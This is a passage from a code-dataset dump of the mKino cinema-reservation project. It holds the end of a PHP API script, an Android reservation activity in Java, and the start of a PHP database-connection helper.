json_encode($projekcije);\r\n }\r\n // sjedala za projekciju\r\n else if ($_GET['tip'] == 'sjedalaProjekcija')\r\n {\r\n require_once 'filmovi.php'; \r\n $sjedala = Filmovi::DohvatiSjedalaProjekcija($_GET['projekcija']);\r\n echo json_encode($sjedala);\r\n }\r\n //rezervacija ulaznica\r\n else if($_GET['tip'] == 'rezervacija')\r\n {\r\n require_once 'filmovi.php'; \r\n $sjedala = $_POST['sjedala'];\r\n $korisnik = $_POST['korisnik'];\r\n $projekcija = $_POST['projekcija'];\r\n \r\n $uspjesno = Filmovi::Rezerviraj($projekcija,$korisnik, $sjedala);\r\n echo json_encode($uspjesno);\r\n }\r\n //moje rezervacije\r\n\r\n //moje rezervacije\r\n else if($_GET['tip'] == 'obrisirezervaciju')\r\n {\r\n require_once 'filmovi.php'; \r\n\t$korisnickoIme = $_POST['korisnickoime'];\r\n $projekcija = $_POST['projekcija'];\r\n \r\n $uspjesno = Filmovi::ObrisiMojuRezervaciju($korisnickoIme, $projekcija);\r\n echo json_encode($uspjesno);\r\n }\r\n // projekcije na odreÄ‘eni dan\r\n else if ($_GET['tip'] == 'projekcijeNaDan')\r\n {\r\n require_once 'filmovi.php';\r\n $godina = $_GET['godina'];\r\n $mjesec = sprintf('%02d', $_GET['mjesec']);\r\n $dan = sprintf('%02d', $_GET['dan']);\r\n $datum = \"$godina-$mjesec-$dan\";\r\n $projekcije = Filmovi::DohvatiProjekcijeNaDan($_GET['film'], $_GET['multipleks'], $datum);\r\n echo json_encode($projekcije);\r\n }\r\n \r\n // prijava korisnika\r\n else if ($_GET['tip'] == 'prijava')\r\n {\r\n require_once 'korisnici.php';\r\n $korisnik = Korisnici::PrijaviSe($_POST['korisnickoIme'], $_POST['lozinka']);\r\n echo json_encode($korisnik);\r\n }\r\n \r\n // registracija korisnika\r\n else if ($_GET['tip'] == 'registracija')\r\n {\r\n require_once 'korisnici.php';\r\n $podaci = array();\r\n $podaci['korisnickoIme'] = $_POST['korisnickoIme'];\r\n $podaci['salt'] = hash('sha512', time());\r\n $podaci['lozinka'] = hash('sha512', $_POST['lozinka'] . $podaci['salt']);\r\n $podaci['ime'] = $_POST['ime'];\r\n $podaci['prezime'] = $_POST['prezime'];\r\n $podaci['email'] = $_POST['email'];\r\n $podaci['telefon'] = $_POST['telefon'];\r\n $povratnaInformacija = Korisnici::RegistrirajSe($podaci);\r\n echo json_encode($povratnaInformacija);\r\n }\r\n \r\n // dohvat multipleksa\r\n else if ($_GET['tip'] == 'multipleksi')\r\n {\r\n require_once 'DB_connect.php';\r\n $upit = \"SELECT * FROM multipleksi\";\r\n $multipleksi = UpitUBazu($upit);\r\n echo json_encode($multipleksi);\r\n }\r\n \r\n // dohvat velikih slika\r\n else if ($_GET['tip'] == 'slike')\r\n {\r\n switch ($_GET['id'])\r\n {\r\n case \"2\": header(\"Location: http://i.imgur.com/41duaTf.jpg\"); break;\r\n case \"3\": header(\"Location: http://i.imgur.com/Lz9I5IV.jpg\"); break;\r\n case \"4\": header(\"Location: http://i.imgur.com/5QHm0os.jpg\"); break;\r\n case \"5\": header(\"Location: http://i.imgur.com/W4ES8Cy.jpg\"); break;\r\n case \"6\": header(\"Location: http://i.imgur.com/ikGcaAB.jpg\"); break;\r\n case \"7\": header(\"Location: http://i.imgur.com/MzjVnsg.jpg\"); break;\r\n case \"8\": header(\"Location: http://i.imgur.com/M7MnWkj.jpg\"); break;\r\n case \"9\": header(\"Location: http://i.imgur.com/A9DfZlk.jpg\"); break;\r\n case \"10\": header(\"Location: http://i.imgur.com/VKTJTOV.jpg\"); break;\r\n \r\n case \"11\": header(\"Location: http://i.imgur.com/b4xOyuV.jpg\"); break;\r\n case \"12\": header(\"Location: http://i.imgur.com/LCJFEUG.jpg\"); break;\r\n case \"13\": header(\"Location: http://i.imgur.com/JJOt68E.jpg\"); break;\r\n case \"14\": header(\"Location: http://i.imgur.com/P2FxpMW.jpg\"); break;\r\n case \"15\": header(\"Location: http://i.imgur.com/TU0Z9iw.jpg\"); break;\r\n case \"16\": header(\"Location: http://i.imgur.com/yd5Ogel.jpg\"); break;\r\n case \"17\": header(\"Location: http://i.imgur.com/TYWQOH8.jpg\"); break;\r\n case \"18\": header(\"Location: http://i.imgur.com/RznPMMI.jpg\"); break;\r\n case \"19\": header(\"Location: http://i.imgur.com/X7PtQu4.jpg\"); break;\r\n case \"20\": header(\"Location: http://i.imgur.com/cmODA5w.jpg\"); break;\r\n \r\n case \"21\": header(\"Location: http://i.imgur.com/alUguKF.jpg\"); break;\r\n case \"22\": header(\"Location: http://i.imgur.com/nGHZK2L.jpg\"); break;\r\n case \"23\": header(\"Location: http://i.imgur.com/4f7JLUL.jpg\"); break;\r\n case \"24\": header(\"Location: http://i.imgur.com/K53NSsu.jpg\"); break;\r\n case \"25\": header(\"Location: http://i.imgur.com/yjoEYrl.jpg\"); break;\r\n case \"26\": header(\"Location: http://i.imgur.com/ftgC6GD.jpg\"); break;\r\n case \"27\": header(\"Location: http://i.imgur.com/OlSyMT5.jpg\"); break;\r\n case \"28\": header(\"Location: http://i.imgur.com/W2PgXVM.jpg\"); break;\r\n case \"29\": header(\"Location: http://i.imgur.com/R6Nfg64.jpg\"); break;\r\n case \"30\": header(\"Location: http://i.imgur.com/xu5dxMn.jpg\"); break;\r\n \r\n case \"31\": header(\"Location: http://i.imgur.com/OT1S7Ab.jpg\"); break;\r\n case \"32\": header(\"Location: http://i.imgur.com/LBVVjKB.jpg\"); break;\r\n case \"33\": header(\"Location: http://i.imgur.com/xlyP7ey.jpg\"); break;\r\n case \"34\": header(\"Location: http://i.imgur.com/ycV5Jbm.jpg\"); break;\r\n case \"35\": header(\"Location: http://i.imgur.com/SFvYvfO.jpg\"); break;\r\n case \"36\": header(\"Location: http://i.imgur.com/8ksN3w7.jpg\"); break;\r\n case \"37\": header(\"Location: http://i.imgur.com/RISNSTL.jpg\"); break;\r\n case \"38\": header(\"Location: http://i.imgur.com/GVMkesY.jpg\"); break;\r\n case \"39\": header(\"Location: http://i.imgur.com/J1PSoao.jpg\"); break;\r\n case \"40\": header(\"Location: http://i.imgur.com/ma4wI5O.jpg\"); break;\r\n \r\n case \"41\": header(\"Location: http://i.imgur.com/bvyvVZH.jpg\"); break;\r\n case \"42\": header(\"Location: http://i.imgur.com/H0lry9h.jpg\"); break;\r\n case \"43\": header(\"Location: http://i.imgur.com/az7PGpb.jpg\"); break;\r\n case \"44\": header(\"Location: http://i.imgur.com/vPPo6id.jpg\"); break;\r\n case \"45\": header(\"Location: http://i.imgur.com/ikNySIx.jpg\"); break;\r\n case \"46\": header(\"Location: http://i.imgur.com/4NEJUfJ.jpg\"); break;\r\n case \"47\": header(\"Location: http://i.imgur.com/tYhjKwx.jpg\"); break;\r\n case \"48\": header(\"Location: http://i.imgur.com/Xnl2Jfm.jpg\"); break;\r\n case \"49\": header(\"Location: http://i.imgur.com/lmsD41e.jpg\"); break;\r\n }\r\n }\r\n \r\n \r\n // dohvat malih slika\r\n else if ($_GET['tip'] == 'slikemale')\r\n {\r\n\tswitch ($_GET['id'])\r\n\t{\r\n\t case \"2\": header(\"Location: http://i.imgur.com/fhuwmjN.jpg\"); break;\r\n case \"3\": header(\"Location: http://i.imgur.com/shncnOp.jpg\"); break;\r\n case \"4\": header(\"Location: http://i.imgur.com/l1ZkxI2.jpg\"); break;\r\n case \"5\": header(\"Location: http://i.imgur.com/YQbfygu.jpg\"); break;\r\n case \"6\": header(\"Location: http://i.imgur.com/oPdiKUZ.jpg\"); break;\r\n case \"7\": header(\"Location: http://i.imgur.com/NBsc8a0.jpg\"); break;\r\n case \"8\": header(\"Location: http://i.imgur.com/xI5ayDs.jpg\"); break;\r\n case \"9\": header(\"Location: http://i.imgur.com/zNTEjWw.jpg\"); break;\r\n case \"10\": header(\"Location: http://i.imgur.com/Gpb6t9t.jpg\"); break;\r\n \r\n case \"11\": header(\"Location: http://i.imgur.com/6CdX34K.jpg\"); break;\r\n case \"12\": header(\"Location: http://i.imgur.com/CD5y8OS.jpg\"); break;\r\n case \"13\": header(\"Location: http://i.imgur.com/9jJXkJs.jpg\"); break;\r\n case \"14\": header(\"Location: http://i.imgur.com/NJlzEih.jpg\"); break;\r\n case \"15\": header(\"Location: http://i.imgur.com/tfCJrV6.jpg\"); break;\r\n case \"16\": header(\"Location: http://i.imgur.com/aQqIrbx.jpg\"); break;\r\n case \"17\": header(\"Location: http://i.imgur.com/rLuAtwh.jpg\"); break;\r\n case \"18\": header(\"Location: http://i.imgur.com/xVkne5N.jpg\"); break;\r\n case \"19\": header(\"Location: http://i.imgur.com/BTxPbMM.jpg\"); break;\r\n case \"20\": header(\"Location: http://i.imgur.com/mtWD9es.jpg\"); break;\r\n \r\n case \"21\": header(\"Location: http://i.imgur.com/uDhILCV.jpg\"); break;\r\n case \"22\": header(\"Location: http://i.imgur.com/SNU5hAY.jpg\"); break;\r\n case \"23\": header(\"Location: http://i.imgur.com/Y3CwUNK.jpg\"); break;\r\n case \"24\": header(\"Location: http://i.imgur.com/Y0l9Q4z.jpg\"); break;\r\n case \"25\": header(\"Location: http://i.imgur.com/ssnK6Vm.jpg\"); break;\r\n case \"26\": header(\"Location: http://i.imgur.com/v1h7CAi.jpg\"); break;\r\n case \"27\": header(\"Location: http://i.imgur.com/zjbVdfr.jpg\"); break;\r\n case \"28\": header(\"Location: http://i.imgur.com/fQfICzc.jpg\"); break;\r\n case \"29\": header(\"Location: http://i.imgur.com/DNfo0aF.jpg\"); break;\r\n case \"30\": header(\"Location: http://i.imgur.com/ycJ8KLs.jpg\"); break;\r\n \r\n case \"31\": header(\"Location: http://i.imgur.com/z8Hd68m.jpg\"); break;\r\n case \"32\": header(\"Location: http://i.imgur.com/Ewhy0AZ.jpg\"); break;\r\n case \"33\": header(\"Location: http://i.imgur.com/XXxwvIC.jpg\"); break;\r\n case \"34\": header(\"Location: http://i.imgur.com/Dpp0M94.jpg\"); break;\r\n case \"35\": header(\"Location: http://i.imgur.com/WVtj1mL.jpg\"); break;\r\n case \"36\": header(\"Location: http://i.imgur.com/CAiV3FU.jpg\"); break;\r\n case \"37\": header(\"Location: http://i.imgur.com/xuuSCoM.jpg\"); break;\r\n case \"38\": header(\"Location: http://i.imgur.com/dVUNbps.jpg\"); break;\r\n case \"39\": header(\"Location: http://i.imgur.com/DETgBHh.jpg\"); break;\r\n case \"40\": header(\"Location: http://i.imgur.com/1giMHc5.jpg\"); break;\r\n \r\n case \"41\": header(\"Location: http://i.imgur.com/vHGma35.jpg\"); break;\r\n case \"42\": header(\"Location: http://i.imgur.com/5RqA71y.jpg\"); break;\r\n case \"43\": header(\"Location: http://i.imgur.com/pje2KYS.jpg\"); break;\r\n case \"44\": header(\"Location: http://i.imgur.com/ExWIfhd.jpg\"); break;\r\n case \"45\": header(\"Location: http://i.imgur.com/fZFGUJ6.jpg\"); break;\r\n case \"46\": header(\"Location: http://i.imgur.com/NCy0e8k.jpg\"); break;\r\n case \"47\": header(\"Location: http://i.imgur.com/6xXmYyG.jpg\"); break;\r\n case \"48\": header(\"Location: http://i.imgur.com/qCOpBtG.jpg\"); break;\r\n case \"49\": header(\"Location: http://i.imgur.com/ArseZX8.jpg\"); break;\r\n\t}\r\n }\r\n \r\n // pogreška\r\n else\r\n {\r\n echo \"Nisu uneseni parametri\";\r\n }\r\n?> " }, { "alpha_fraction": 0.6528083682060242, "alphanum_fraction": 0.6554985046386719, "avg_line_length": 31.516393661499023, "blob_id": "83af44dc42919d4ca40697d7fda221e2a07a7ac1", "content_id": "8b3de4cde2cbb6904e63af24ab4b5bab63d718d4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 12286, "license_type": "no_license", "max_line_length": 149, "num_lines": 366, "path": "/client-side/src/hr/air/mkino/RezervacijaActivity.java", "repo_name": "dsitum/mKino", "src_encoding": "WINDOWS-1250", "text": "package hr.air.mkino;\r\n\r\n\r\n\r\nimport java.util.ArrayList;\r\nimport java.util.Iterator;\r\nimport java.util.List;\r\n\r\nimport hr.air.mkino.baza.MultipleksAdapter;\r\nimport hr.air.mkino.baza.PrijavljeniKorisnikAdapter;\r\n\r\nimport hr.air.mkino.baza.ProjekcijeAdapter;\r\nimport hr.air.mkino.core.Prijava;\r\nimport hr.air.mkino.server.JsonDohvatiSjedala;\r\nimport hr.air.mkino.server.JsonRezervacija;\r\nimport hr.air.mkino.sucelja.ISlikaFilma;\r\nimport hr.air.mkino.tipovi.Korisnik;\r\nimport hr.air.mkino.tipovi.MultipleksInfo;\r\nimport hr.air.mkino.tipovi.ProjekcijaInfo;\r\nimport hr.air.mkino.tipovi.RezervacijaInfo;\r\nimport hr.air.mkino.uzorcidizajna.UcitajSlikuFactory;\r\n\r\nimport android.app.Activity;\r\nimport android.app.AlertDialog;\r\nimport android.app.Dialog;\r\nimport android.content.Context;\r\nimport android.content.DialogInterface;\r\n\r\nimport android.content.Intent;\r\nimport android.os.Bundle;\r\n\r\nimport android.view.View;\r\n\r\nimport android.view.Window;\r\nimport android.view.View.OnClickListener;\r\n\r\nimport android.widget.Button;\r\nimport android.widget.ImageView;\r\n\r\nimport android.widget.TextView;\r\nimport android.widget.Toast;\r\n/**\r\n * Ovom su klasom ostvarene rezervacije.\r\n * @author bstivic\r\n *\r\n */\r\npublic class RezervacijaActivity extends Activity {\r\n\t\r\n\tCharSequence[] sjedalaPrikaz = {};\r\n\tboolean [] sjedalaBool = {};\r\n\tList<Integer> sjedalaZauzeta = new ArrayList<Integer>();\r\n\tList<Integer> listaOdabranih = new ArrayList<Integer>();\r\n\tfinal int BROJ_SJEDALA = 60;\r\n\tfinal int OGRANICENJE_SJEDALA = 30;\r\n\tfinal Context con = this;\r\n\tboolean moguceRezervirati = true;\r\n\tint idProjekcije;\r\n\tProjekcijaInfo detaljiProjekcije;\r\n\t\r\n\t@Override\r\n\tprotected void onCreate(Bundle savedInstanceState) {\r\n\t\tsuper.onCreate(savedInstanceState);\r\n\t\tsetContentView(R.layout.activity_rezervacije);\r\n\t\tsetTitle(\"Rezervacija projekcije\");\r\n\t\t\r\n\t\tTextView sjedalaTV = (TextView) findViewById(R.id.rezervacije_sjedala_txt);\t\r\n\t\tButton btnMapaSjedala = (Button) findViewById(R.id.btn_rezervacije_mapa_sjedala);\r\n\t\tButton btnRezerviraj = (Button) findViewById(R.id.btn_rezervacija_rezerviraj);\r\n\t\tdetaljiProjekcije = dohvatiPodatkeZaProjekciju();\r\n\t\tprikaziPodatkeZaProjekciju(detaljiProjekcije);\r\n\t\tIntent i = getIntent();\t\r\n\r\n\t\tfinal int idProjekcijeUBazi = i.getIntExtra(\"idProjekcijeUBazi\", 0);\r\n\t\tidProjekcije = idProjekcijeUBazi;\r\n\t\tJsonDohvatiSjedala dhSj = new JsonDohvatiSjedala();\t\t\r\n\t\tsjedalaZauzeta = dhSj.dohvatiSjedala(idProjekcijeUBazi);\r\n\t\t\r\n\t\tmoguceRezervirati = provjeriZauzetost();\r\n\t\r\n\t\tfiltrirajSlobodnaSjedala();\r\n\r\n\t\t/* *\r\n\t\t * Ukoliko nije moguće rezervirati sjedala za odabranu projekciju iz pojedinih razloga, onda ćemo korisniku\r\n\t\t * zabraniti odabir sjedala, pregled mape i klik na rezervaciju!\r\n\t\t * */\r\n\t\tif(moguceRezervirati)\r\n\t\t{\r\n\t\t\tsjedalaTV.setOnClickListener(new OnClickListener() {\t\t\t\r\n\t\t\t\t@Override\r\n\t\t\t\tpublic void onClick(View v) {\t\t\t\r\n\t\t\t\t\tprikaziDijalog();\r\n\t\t\t\t}\r\n\t\t\t});\r\n\t\t\t\r\n\t\t\r\n\t\t\tfinal Dialog dialogSjedala = new Dialog(con);\r\n\t\t\tdialogSjedala.requestWindowFeature(Window.FEATURE_NO_TITLE);\r\n\t\t\tdialogSjedala.setContentView(R.layout.dialog_mapa_sjedala);\r\n\t\r\n\t\t\t\r\n\t\t\tbtnMapaSjedala.setOnClickListener(new OnClickListener() {\t\t\t\r\n\t\t\t\t@Override\r\n\t\t\t\tpublic void onClick(View v) {\r\n\t\t\t\t\tdialogSjedala.show();\r\n\t\t\t\t\tButton gumbZaIzlaz = (Button) dialogSjedala.findViewById(R.id.mapa_sjedala_nastavi_btn);\r\n\t\t\t\t\tgumbZaIzlaz.setOnClickListener(new OnClickListener() {\r\n\t\t\t\t\t\t@Override\r\n\t\t\t\t\t\tpublic void onClick(View v) {\r\n\t\t\t\t\t\t\tdialogSjedala.hide();\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t});\t\t\t\t\r\n\t\t\t\t}\r\n\t\t\t});\r\n\t\t\tbtnRezerviraj.setOnClickListener(new OnClickListener() {\t\t\t\r\n\t\t\t\t@Override\r\n\t\t\t\tpublic void onClick(View v) {\r\n\t\t\t\t\trezerviraj();\t\t\t\t\t\r\n\t\t\t\t}\r\n\t\t\t});\r\n\t\t}\r\n\t\telse\r\n\t\t{\r\n\t\t\tToast.makeText(this, R.string.rezervacija_nije_moguce_rezervirati, Toast.LENGTH_LONG).show();\r\n\t\t}\r\n\t}\r\n\t\r\n\t/*\r\n\t * Metoda koja prvo utvrđuje je li moguće izvršiti rezervaciju,\r\n\t * ukoliko nije moguće izvršiti rezervaciju korisniku se prikazuje poruka. \r\n\t * Ako korisnik nije odabrao sjedala za projekciju rezervacija se obustavlja i prikazuje se poruka.\r\n\t * Ukoliko su svi preuvjeti zadovoljeni nastavlja se korak rezervacije.\r\n\t * */\r\n\tpublic void rezerviraj()\r\n\t{\r\n\t\tPrijavljeniKorisnikAdapter prijavljeniKorisnik = new PrijavljeniKorisnikAdapter(this);\r\n\t\tKorisnik korisnik = prijavljeniKorisnik.dohvatiPrijavljenogKorisnika();\r\n\t\tContext context = this;\r\n \tPrijava prijava = new Prijava();\r\n\t\t\r\n\t\tif(!moguceRezervirati)\r\n\t\t{\r\n\t\t\tToast.makeText(this, R.string.rezervacija_nije_moguce_rezervirati, Toast.LENGTH_LONG).show();\r\n\t\t}\r\n\t\telse if(listaOdabranih.size() == 0)\r\n\t\t{\r\n\t\t\tToast.makeText(this, R.string.rezervacija_odaberite_sjedala, Toast.LENGTH_LONG).show();\r\n\t\t}\r\n\t\telse if( korisnik == null)\r\n\t\t{\r\n\t\t\tprijava.prikaziDijalog(context);\r\n\t\t}\r\n\t\telse\r\n\t\t{\r\n\t\t\tJsonRezervacija jsonRezervacije = new JsonRezervacija();\r\n\t\t\tRezervacijaInfo rezervacija = jsonRezervacije.rezerviraj(korisnik.getKorisnickoIme(), idProjekcije, listaOdabranih);\r\n\t\t\tif(rezervacija == null)\r\n\t\t\t{\r\n\t\t\t\tAlertDialog.Builder builder = new AlertDialog.Builder(this);\r\n\t\t builder.setMessage(R.string.rezervacija_pogreska_kod_registracije)\r\n\t\t .setPositiveButton(R.string.rezervacija_shvacam, new DialogInterface.OnClickListener() {\r\n\t\t public void onClick(DialogInterface dialog, int id) {\r\n\t\t \t \r\n\t\t \r\n\t\t }\r\n\t\t });\r\n\t\t builder.show();\r\n\t\t\t}\r\n\t\t\telse\r\n\t\t\t{\r\n\t\t\t\tAlertDialog.Builder builder = new AlertDialog.Builder(this);\r\n\t\t builder.setTitle(R.string.rezervacija_uspjesna)\r\n\t\t \t\t.setMessage(\"Kod rezervacije: \" + rezervacija.getKodRezervacije())\r\n\t\t .setPositiveButton(R.string.rezervacija_nastavi, new DialogInterface.OnClickListener() {\r\n\t\t public void onClick(DialogInterface dialog, int id) {\r\n\t\t \t RezervacijaActivity.this.finish();\r\n\t\t \t Intent intent = new Intent(RezervacijaActivity.this, PocetnaActivity.class);\r\n\t\t startActivity(intent);\r\n\t\t }\r\n\t\t });\r\n\t\t builder.show();\r\n\t\t \r\n\t\t \r\n\t\t \r\n\t\t \r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\t\r\n\tpublic float IzracunajCijenu()\r\n\t{\r\n\t\treturn listaOdabranih.size() * detaljiProjekcije.getCijena();\r\n\t}\r\n\t/**\r\n\t * Metoda koja provjerava je li moguće rezervirati sjedala za projekciju. Ako je projekcija rezervirana više od 30% nije moguće rezervirati ulaznice\r\n\t * @return true ako je moguće, false ako je nemoguće\r\n\t */\r\n\tpublic boolean provjeriZauzetost()\r\n\t{\r\n\t\tfloat postotakZauzetosti = 0;\r\n\t\tif(sjedalaZauzeta.size() != 0 ) \r\n\t\t\tpostotakZauzetosti = BROJ_SJEDALA / sjedalaZauzeta.size()*100;\r\n\t\telse \r\n\t\t\treturn true;\r\n\t\tif(postotakZauzetosti <= 100-OGRANICENJE_SJEDALA)\r\n\t\t\treturn false;\r\n\t\telse\r\n\t\t\treturn true;\r\n\t}\r\n\r\n\t\r\n\t/**\r\n\t * Metoda koja služi za dohvaćanje podataka o projekciji\r\n\t * @return projekcija\r\n\t */\r\n\tprivate ProjekcijaInfo dohvatiPodatkeZaProjekciju() {\r\n\t\tIntent i = getIntent();\r\n\t\tint idProjekcijeUBazi = i.getIntExtra(\"idProjekcijeUBazi\", 0);\r\n\t\t\r\n\t\tProjekcijeAdapter pa = new ProjekcijeAdapter(this);\r\n\t\r\n\t\treturn pa.dohvatiProjekciju(idProjekcijeUBazi, this);\r\n\t}\r\n\t\r\n\t/**\r\n\t * Metoda koja služi za prikaz podataka o projekciji na osnovu proslijeđene projekcije\r\n\t * @param projekcija\r\n\t */\r\n\tprivate void prikaziPodatkeZaProjekciju(ProjekcijaInfo detaljiProjekcije) {\r\n\t\tTextView naslov = (TextView) findViewById(R.id.projekcija_naslov_filma);\r\n\r\n\t\tImageView slika = (ImageView) findViewById(R.id.projekcija_slikaFilma);\r\n\t\tTextView dvorana = (TextView) findViewById(R.id.txt_rezervacije_dvorana);\r\n\t\tTextView vrijeme = (TextView) findViewById(R.id.txt_rezervacije_vrijeme);\r\n\t\tTextView multipleks = (TextView) findViewById(R.id.txt_rezervacije_grad);\r\n\t\tTextView cijena = (TextView) findViewById(R.id.rezervacija_cijena);\r\n\t\tnaslov.setText(detaljiProjekcije.getNaziv());\r\n\t\tcijena.setText(\"0.00\");\r\n\t\tdvorana.setText(\"Dvorana \"+detaljiProjekcije.getDvorana());\t\t\r\n\t\tString vrijePocetkString = detaljiProjekcije.getVrijemePocetka();\r\n\t\tvrijeme.setText(vrijePocetkString);\r\n\t\t\r\n\t\t//dohvaćanje multipleksa iz lokalne baze podatka\r\n\t\tMultipleksAdapter ma = new MultipleksAdapter(this);\r\n\t\tMultipleksInfo multipl = ma.dohvatiMultipleks(detaljiProjekcije.getMultipleks());\r\n\t\tif(multipl != null) multipleks.setText(multipl.getNaziv());\t\t\r\n\t\t\r\n\t\tISlikaFilma sf = UcitajSlikuFactory.ucitaj(this, detaljiProjekcije.getIdFilma(), true);\r\n\t\tslika.setImageBitmap(sf.dohvatiVelikuSliku());\r\n\t\t\r\n\t}\r\n\r\n\t/**\r\n\t * Metoda koja služi za prikaz dijaloga sa popisom slobodnih sjedala\r\n\t * Nakon odabira sjedala navedeni se spremaju u listu odabranih sjedala\r\n\t */\r\n\tprivate void prikaziDijalog(){\t\t\t\r\n\t\tAlertDialog.Builder builder = new AlertDialog.Builder(this);\r\n builder.setTitle(R.string.odabir_sjedala_txt_odaberi_sjedalo) \r\n .setMultiChoiceItems(sjedalaPrikaz, sjedalaBool,\r\n new DialogInterface.OnMultiChoiceClickListener() {\r\n @Override\r\n public void onClick(DialogInterface dialog, int which,\r\n boolean isChecked) {\r\n \t String parsiran = (String) sjedalaPrikaz[which];\r\n \t String[] pars = parsiran.split(\" \");\r\n if (isChecked) {\r\n // If the user checked the item, add it to the selected items \t\r\n \t listaOdabranih.add(Integer.parseInt(pars[1]));\r\n } else \r\n {\r\n \t for (Iterator<Integer> iter = listaOdabranih.listIterator(); iter.hasNext(); ) {\r\n \t\t int a = iter.next();\r\n \t\t int b = Integer.parseInt(pars[1]);\r\n \t\t if ( b == a) {\r\n \t\t iter.remove();\r\n \t\t }\r\n \t\t}\r\n \t\r\n }\r\n azurirajOdabranaMjesta();\r\n /*TODO prikazi cijenu na layoutu i invalidate napravi*/\r\n \r\n \r\n }\r\n }) \r\n .setPositiveButton(R.string.odabir_sjedala_btn_prihvati, new DialogInterface.OnClickListener() {\r\n public void onClick(DialogInterface dialog, int id) {\r\n // RezervacijaActivity.this.finish();\r\n }\r\n });\r\n \r\n builder.create().show(); \r\n\r\n\t}\r\n\r\n\t/**\r\n\t * Metoda koja ažurira popis odabranih mjesta\r\n\t */\r\n\tpublic void azurirajOdabranaMjesta()\r\n\t{\r\n\t\tTextView sjedalaTV = (TextView) findViewById(R.id.rezervacije_sjedala_txt);\t\r\n\t\tTextView cijena = (TextView) findViewById(R.id.rezervacija_cijena);\r\n\t\tif(listaOdabranih.size() == 0)\r\n\t\t{\r\n\t\t\tsjedalaTV.setText(R.string.odabir_sjedala_txt_odaberi_sjedalo);\r\n\t\t\tcijena.setText(\"0.00\");\r\n\t\t\tsjedalaTV.invalidate();\r\n\t\t}\r\n\t\telse\r\n\t\t{\r\n\t\t\tcijena.setText(Float.toString(IzracunajCijenu()));\r\n\t\t\tcijena.invalidate();\r\n\t\t\tString text = \"\";\r\n\t\t\tfor (Integer sjedalo : listaOdabranih) {\r\n\t\t\t\ttext += (\"\"+ Integer.toString(sjedalo)+\", \");\r\n\t\t\t}\r\n\t\t\ttext = text.substring(0,text.length()-3);\r\n\t\t\tsjedalaTV.setText(text);\r\n\t\t\tsjedalaTV.invalidate();\r\n\t\t}\r\n\t\t\r\n\t}\r\n\r\n\t/**\r\n\t * Metoda koja ubacuje slobodna sjedala u listu slobodnih sjedala, te dodjeljuje niz odabranih vrijednosti u checkboxu\r\n\t */\r\n\tpublic void filtrirajSlobodnaSjedala()\r\n\t{\r\n\t\t\r\n\t\tint indeksNiza = 0;\r\n\t\tif(sjedalaZauzeta != null)\r\n\t\t{\r\n\t\t\tint brojSlobodnihSj = BROJ_SJEDALA - sjedalaZauzeta.size();\r\n\t\t\tsjedalaBool = new boolean[brojSlobodnihSj];\r\n\t\t\tsjedalaPrikaz = new CharSequence[brojSlobodnihSj];\r\n\t\t\t\r\n\t\t\tfor (int i = 1; i<=BROJ_SJEDALA; i++)\r\n\t\t\t{\r\n\t\t\t\tif(!sjedalaZauzeta.contains(i))\r\n\t\t\t\t{\r\n\t\t\t\t\tsjedalaPrikaz[indeksNiza] = \"Sjedalo \" + Integer.toString(i);\r\n\t\t\t\t\tsjedalaBool[indeksNiza] = false;\r\n\t\t\t\t\tindeksNiza += 1;\r\n\t\t\t\t}\r\n\t\t\t\t\r\n\t\t\t}\r\n\t\t}\r\n\t\telse\r\n\t\t{\r\n\t\t\tint brojSlobodnihSj = BROJ_SJEDALA;\r\n\t\t\tsjedalaBool = new boolean[brojSlobodnihSj];\r\n\t\t\tsjedalaPrikaz = new CharSequence[brojSlobodnihSj];\r\n\t\t\t\r\n\t\t\t//punimo nizove sa prikazom slobodnih sjedala i opcijom odabira checkboxa\r\n\t\t\tfor (int i = 1; i<=BROJ_SJEDALA; i++)\r\n\t\t\t{\t\t\t\t\r\n\t\t\t\tsjedalaPrikaz[indeksNiza] = \"Sjedalo \" +Integer.toString(i);\r\n\t\t\t\tsjedalaBool[indeksNiza] = false;\r\n\t\t\t\tindeksNiza += 1;\r\n\t\t\t}\r\n\t\t}\r\n\t\t\r\n\r\n\t\r\n\t}\r\n}\r\n" }, { "alpha_fraction": 0.44540902972221375, "alphanum_fraction": 0.4504173696041107, "avg_line_length": 24.289474487304688, "blob_id": "6f2864fa2bee298a8a71e8a9290abace6266a067", "content_id": "bbd104128d9a0c1b18b4aff7bbf33797b531e8a0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 3005, "license_type": "no_license", "max_line_length": 118, "num_lines": 114, "path": "/server-side/Datoteke/skripte/DB_connect.php", "repo_name": "dsitum/mKino", "src_encoding": "UTF-8", "text": "<?php\r\n //klasa za izvršavanje upita nad bazom\r\n define(\"HOST\", \"localhost\");\r\n define(\"USER\", \"root\");\r\n define(\"PASS\", \"123456\");\r\n define(\"BAZA\", \"airbaza\");\r\n\r\n class Upit {\r\n public $conn;\r\n\r\n function __construct() {\r\n $this->conn = new mysqli(HOST, USER, PASS, BAZA);\r\n if ($this->conn->connect_errno) {\r\n die('Pogreška pri spajanju na bazu podataka. Jesu li podaci ispravno uneseni? MySQL kaže: <br>'\r\n . $this->conn->connect_error);\r\n } \r\n $this->conn->set_charset(\"utf8\");\r\n }\r\n\r\n function Izvrsi($upit) {\r\n $rezultat = $this->conn->query($upit);\r\n\r\n if(! $rezultat) {\r\n die(\"Problem pri uonsu u bazu. MySQL kaže: <br>\" . $this->conn->error);\r\n } else {\r\n return $rezultat;\r\n }\r\n }\r\n\r\n function __destruct() {\r\n $this->conn->close();\r\n }\r\n \r\n }\r\n \r\n//******************************************************************************************************************//\r\n //Ova funkcija služi za brže izvršavanje sql upita\r\n function Upit($naredba) {\r\n /*$upit = new Upit();\r\n $upit->Izvrsi(\"SET CHARACTER SET utf8\");\r\n unset($upit);*/\r\n $upit = new Upit();\r\n $rezultat = $upit->Izvrsi($naredba);\r\n unset($upit);\r\n return $rezultat;\r\n }\r\n //transakcije\r\n function begin()\r\n {\r\n Upit(\"BEGIN\");\r\n }\r\n function commit()\r\n {\r\n Upit(\"COMMIT\");\r\n }\r\n function rollback()\r\n {\r\n Upit(\"ROLLBACK\");\r\n }\r\n //funkcija za izvršavanje transakcije\r\n function Transakcija($upit)\r\n {\r\n $rezultat = Upit($upit); \r\n \r\n if ($rezultat > 0)\r\n {\r\n // $rezultat->fetch_assoc(); \r\n return $rezultat;\r\n\r\n } else\r\n { \r\n //print_r($rezultat);\r\n $zapis = -6;\r\n return 